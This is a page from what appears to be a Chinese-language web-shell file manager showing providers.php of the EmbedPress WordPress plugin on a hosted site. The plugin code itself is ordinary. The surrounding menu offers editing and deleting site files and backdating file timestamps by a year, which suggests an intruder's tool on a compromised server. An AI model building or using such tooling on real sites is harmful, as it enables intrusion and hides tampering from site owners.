文件操作 - providers.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/creatormedianetwork/public_html/wp-content/plugins/embedpress/providers.php
编辑文件内容
<?php (defined('ABSPATH') && defined('EMBEDPRESS_IS_LOADED')) or die("No direct script access allowed."); /** * Declare an associative array that is responsible for mapping additional service providers to its urls. * The key must match the class placed in ./EmbedPress/Providers/ folder, and the values must be a string or * another array listing all url patterns in which the key (a.k.a. the service provider you're adding) * should be triggered. * * @package EmbedPress * @author EmbedPress <help@embedpress.com> * @copyright Copyright (C) 2023 WPDeveloper. All rights reserved. * @license GPLv3 or later * @since 1.0.0 */ $host_url = parse_url(site_url()); $additionalServiceProviders = [ EMBEDPRESS_NAMESPACE . "\\Providers\\GoogleMaps" => ["google.com", "google.com.*", "maps.google.com", "goo.gl", "google.co.*"], EMBEDPRESS_NAMESPACE . "\\Providers\\GoogleDrive" => ["drive.google.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\GooglePhotos" => ["photos.app.goo.gl", "photos.google.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\GoogleDocs" => ["docs.google.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\GoogleCalendar" => ["calendar.google.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\Twitch" => ["twitch.tv", "clips.twitch.tv"], EMBEDPRESS_NAMESPACE . "\\Providers\\Giphy" => ["giphy.com", "i.giphy.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\Boomplay" => ["boomplay.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\Youtube" => ["youtube.com", "youtu.be", "m.youtube.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\OpenSea" => ["opensea.io"], EMBEDPRESS_NAMESPACE . "\\Providers\\NRKRadio" => ["radio.nrk.no", "nrk.no"], EMBEDPRESS_NAMESPACE . "\\Providers\\GitHub" => ["gist.github.com", "github.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\InstagramFeed" => ["instagram.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\Gumroad" => ["*.gumroad.com", "gumroad.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\X" => ["*.x.com", "x.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\Calendly" => ["*.calendly.com", "calendly.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\Gumroad" => ["*.gumroad.com", "gumroad.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\Calendly" => ["*.calendly.com", "calendly.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\LinkedIn" => ["*.linkedin.com", "linkedin.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\SelfHosted" => [$host_url['host'], "*.com", "*.net", "*.org", "*.edu", "*.gov", "*.mil", "*.int", "*.biz", "*.info", "*.jobs", "*.mobi", "*.name", "*.aero", "*.coop", "*.travel", "*.museum", "*.cat", "*.pro", "*.tel", "*.asia", "*.xxx", "*.post", "*.geo", "*.nato", "*.tl", "*.dk"], EMBEDPRESS_NAMESPACE . "\\Providers\\Spreaker" => ["*.spreaker.com", "spreaker.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\AirTable" => ["*.airtable.com", "airtable.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\Canva" => ["*.canva.com", "canva.com"], EMBEDPRESS_NAMESPACE . "\\Providers\\OneDrive" => ["onedrive.live.com", "1drv.ms"], EMBEDPRESS_NAMESPACE . "\\Providers\\FITE" => ['fite.tv', 'triller.tv','trillertv.com'], EMBEDPRESS_NAMESPACE . "\\Providers\\Meetup" => ['meetup.com'], EMBEDPRESS_NAMESPACE . "\\Providers\\GettyImages" => ['gettyimages.com'], EMBEDPRESS_NAMESPACE . "\\Providers\\Wistia" => ['*.wistia.com', 'wistia.com'], ];
修改文件时间
将文件时间修改为当前时间的前一年
删除文件